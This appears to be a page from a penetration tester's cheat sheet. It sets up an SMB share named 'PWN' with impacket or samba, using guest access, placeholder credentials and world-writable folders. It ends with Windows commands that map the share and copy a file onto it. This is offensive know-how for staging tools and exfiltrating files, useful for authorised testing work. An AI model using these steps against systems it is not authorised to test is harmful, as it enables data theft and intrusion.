###
SMB
###

*********
smbserver
*********

.. code-block:: bash

  # Install/Upgrade impacket
  sudo python3 -m pip install --upgrade impacket

  # Run SMB server
  cd $(mktemp -d) && sudo smbserver.py PWN . &

  # Eventually check if everything is working
  echo -e "shares\nuse PWN\nls" | smbclient.py localhost -no-pass 

|

| Windows policies can deny guest access and/or smbv1, you can enable smb2

.. code-block:: bash

  smbserver.py PWN . -ip 0.0.0.0 -smb2support -username bla -password bla

|

*****
samba
*****

| When smbserver doesn't work as intended, samba is a good alternative.

.. code-block:: bash

  sudo apt install samba
  sudo cp /etc/samba/smb.conf /etc/samba/smb.conf.ori
  sudo vim /etc/samba/smb.conf

|

| Configuration example bellow

.. code-block::

  [global]
    workgroup = WORKGROUP
    server string = %h server (Samba, Ubuntu)
    log file = /var/log/samba/log.%m
    max log size = 1000
    logging = file
    panic action = /usr/share/samba/panic-action %d
    server role = standalone server
    obey pam restrictions = yes
    unix password sync = yes
    passwd program = /usr/bin/passwd %u
    passwd chat = *Enter\snew\s*\spassword:* %n\n *Retype\snew\s*\spassword:* %n\n *password\supdated\ssuccessfully* .
    pam password change = yes
    map to guest = bad user
    usershare allow guests = yes

  [PWN]
    comment = PWN
    path = /tmp/PWN
    browsable = yes
    guest ok = yes
    read only = no
    create mask = 0775
    force create mode = 0775
    security mask = 0775
    force security mode = 0775
    store dos attributes = yes
    directory mask = 2775
    force directory mode = 2775
    directory security mask = 2775
    force directory security mode = 2775

|

| Then restart samba and create the shared folder

.. code-block:: bash

  sudo service samba restart
  mkdir /tmp/PWN
  chmod 777 /tmp/PWN

|

************
Common Usage
************

| With net use

.. code-block:: powershell

  net use X: \\1.2.3.4\PWN

|

| With New-SmbMapping

.. code-block:: powershell

  New-SmbMapping -RemotePath '\\1.2.3.4\PWN' -Username "bla" -Password "bla"
  cp file.zip \\1.2.3.4\PWN\


|
